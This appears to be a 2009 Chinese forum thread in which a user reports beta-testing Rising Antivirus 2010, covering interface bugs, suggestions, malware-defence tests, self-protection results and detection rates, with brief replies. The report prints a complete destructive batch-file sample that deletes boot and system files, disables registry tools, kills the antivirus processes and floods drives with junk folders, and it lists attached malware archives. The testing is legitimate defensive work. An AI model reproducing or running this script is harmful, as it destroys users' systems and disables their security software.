12   1  /  2  页   跳转

[RAV] 瑞星杀毒软件2010测试报告(6月25日)

瑞星杀毒软件2010测试报告(6月25日)

瑞星杀毒软件2010测试报告(6月25日)

测试环境:
操作系统:WindowsXP pro SP3(虚拟机)

内存:224MB

瑞星程序版本:22.00.00.07

病毒库版本:22.01.03.03

测试内容:
一BUG反馈

点击“刷新”按钮,页面刷新速率较慢,可看明显看到页面残缺(如上图抓怕到的一瞬间)。建议调整刷新速率。


引擎查杀病毒包时,点击“不作处理”,结果卡死。发生错误,监控退出。


同上,瑞星杀毒软件失去了响应。


同上。

测试中还发生过以下错误:




查杀信息处存在BUG

没有显示正在查杀哪个文件夹。

二建议反馈

主页中的信息内容,为什么不单独做一个窗口供用户选择是否查看呢?目前,主页的很大部分面积被资讯占据,这是种浪费啊,信息中心的价值不大,建议在下一个版本中修改,千万别守着这个习惯不改。独立出的资讯中心,可以通过点击小绿伞弹出的菜单点开。


“未扫描或修复漏洞”能不能不添加到检测目标到中啊?因为不是每个安装杀毒软件都想安装卡卡。不安装卡卡,又总说存在风险。

家庭模式的解释文字位置建议调整。


“清除病毒”“不处理”按钮建议支持键盘操作,方便用户使用。


像千千静听这样常用的软件防火墙都不能识别,是不是有点说不过去啊?建议将防火墙纳入云安全系统,生成一份白名单,这样能提高防火墙的效率。


这个电脑防护的日志实在令人看不懂,到底阻止了什么,根本看不出啊。是不是该改改??

三木马行为防御测试
设置:文件监控关闭。系统加固,木马行为防御等开启,且处于默认设置。
样本一:感染型病毒。
文件名:explorer.exe

成功拦截。

样本二:恶意程序
文件名:谁点谁知道.bat
木马行为防御未报毒,系统加固未报毒。

批处理文件内容:
attrib -r -h -s c:\ntldr
attrib -r -h -s c:\*.sys
del c:\ntldr
del c:\*.sys
@reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
taskkill /f /im MPSVC1.exe/t
taskkill /f /im MPSVC2.exe/t
taskkill /f /im MPSVC.exe/t
attrib -r -h -s C:\windows\*.exe
attrib -r -h -s C:\windows\system32\*.exe
attrib -r -h -s C:\windows\system32\*.cpl
del C:\windows\*.exe
del C:\windows\system32\*.exe
del C:\windows\system32\*.cpl
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
Shutdown
date 2099-10-10

本人知识水平不足,推测该批处理删除所有驱动文件。
添加注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
搜索所有系统目录下的exe文件并删除。
在各个分区,创建大量的歧义文件夹,消耗用户资源。
修改时间。

这个病毒最变态的就是产生大量歧义文件,很恶心。瑞星对此类恶意程序要加强拦截力度。

样本三:伪数字签名病毒
文件名:new.exe

成功拦截。

样本四:后门病毒
文件名:1.exe
运行后,木马行为防御未报毒。注册表编辑器被禁用。
虚拟机中明明没有打开IE,却有IE的进程。


用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
最后编辑DoctorLc 最后编辑于 2009-08-03 21:23:13
分享到:
gototop
 

回复: 瑞星杀毒软件2010测试报告(6月25日)

样本四:恶性病毒
文件名:gr.exe

该文件由FSG加壳。
该病毒运行后尝试调用rundll32.exe,但被瑞星拦截。

若该步未被拦截,此病毒将恢复SSDT表,使主动防御失效。

四自我保护及系统加固测试
样本依旧采用gr.exe,但关闭了木马行为防御。看看瑞星的最后一层防线是否会被突破。
运行该样本后,系统加固无任何提示。该进程成功运行。


该病毒尝试结束瑞星的进程,自我保护规则生效。


本以为瑞星成功抵御了该病毒,但实际上瑞星的监控已经退出。


杀毒软件都被破坏了,防火墙更不能幸免。


从开始菜单中,点击监控中心,未恢复。

修复瑞星杀毒软件后,依旧未恢复。



就此,瑞星的最后一道防线宣布被彻底摧毁。这意味着,如果病毒能够透过“木马入侵防御”和“木马行为防御”及特征扫描,那么最后的一层防线就比较容易穿透。
最后编辑DoctorLc 最后编辑于 2009-06-25 19:30:06
gototop
 

回复: 瑞星杀毒软件2010测试报告(6月25日)

五引擎测试
样本容量:65个病毒文件
引擎设置:默认
扫描用时:190秒
剩余文件数:2个
启发式扫描:0个
特征扫描:63个
查杀率:96.9%
查杀速率:17.6KB/S



样本容量:65个病毒文件
引擎设置:高级 并开启高级启发
扫描用时:174秒
剩余文件数:2个
启发式扫描:0个
特征扫描:63个
查杀率:96.9%
查杀速率:19.2KB/S


引擎的扫描速度慢的惊人!工程师解释一下,这种速度肯定令用户不满。

今日测试到此为止。望工程师好好考虑一下建议。

昨日测试报告:
http://bbs.ikaka.com/showtopic-8635685.aspx

附件附件:

文件名:explorer.rar
下载次数:354
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

下载次数:364
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

下载次数:341
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

文件名:1.part1.rar
下载次数:346
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

文件名:1.part2.rar
下载次数:337
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

文件名:1.part3.rar
下载次数:338
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

文件名:gr.rar
下载次数:363
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

文件名:virus.part1.rar
下载次数:367
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

附件附件:

文件名:virus.part2.rar
下载次数:316
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-25 19:56:58
描述:rar

最后编辑DoctorLc 最后编辑于 2009-06-25 19:58:23
gototop
 

回复:瑞星杀毒软件2010测试报告(6月25日)

测试好认真....

偶就没那个时间了  楼主加油
一见钟情,再而衰,三而竭。
gototop
 

回复: 瑞星杀毒软件2010测试报告(6月25日)



引用:
原帖由 wjzdw 于 2009-6-25 20:34:00 发表
测试好认真....

偶就没那个时间了  楼主加油


谢谢!谢谢!

高考结束了,没事可做,只好测试玩玩。

不过,这两天填报志愿真的把我弄的头大死了。
gototop
 

回复:瑞星杀毒软件2010测试报告(6月25日)

咨询建议不错 ,,,楼主的建议确实比较丰富,,但是瑞星不接受,,,还有去年的你设计的那些界面和升级界面瑞星都没有采纳,,不知道为何,,希望楼主不要白费苦心哦,,支持下
gototop
 

回复: 瑞星杀毒软件2010测试报告(6月25日)



引用:
原帖由 逗你玩xixi 于 2009-6-25 20:50:00 发表
咨询建议不错 ,,,楼主的建议确实比较丰富,,但是瑞星不接受,,,还有去年的你设计的那些界面和升级界面瑞星都没有采纳,,不知道为何,,希望楼主不要白费苦心哦,,支持下



就是就是!
现在有些东西我也不想提了,一些东西也不想画设计图了。没啥意思。瑞星不愿意将全部架构推倒重来。。。没办法。。。这样的瑞星不知未来会如何。。。
gototop
 

回复:瑞星杀毒软件2010测试报告(6月25日)

问一个问题

我关机时瑞星会报错  不知道你们会不会?
一见钟情,再而衰,三而竭。
gototop
 

回复: 瑞星杀毒软件2010测试报告(6月25日)



引用:
原帖由 wjzdw 于 2009-6-25 21:30:00 发表
问一个问题

我关机时瑞星会报错  不知道你们会不会?


不会报错诶。
gototop
 

回复:瑞星杀毒软件2010测试报告(6月25日)

看报告啦~
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT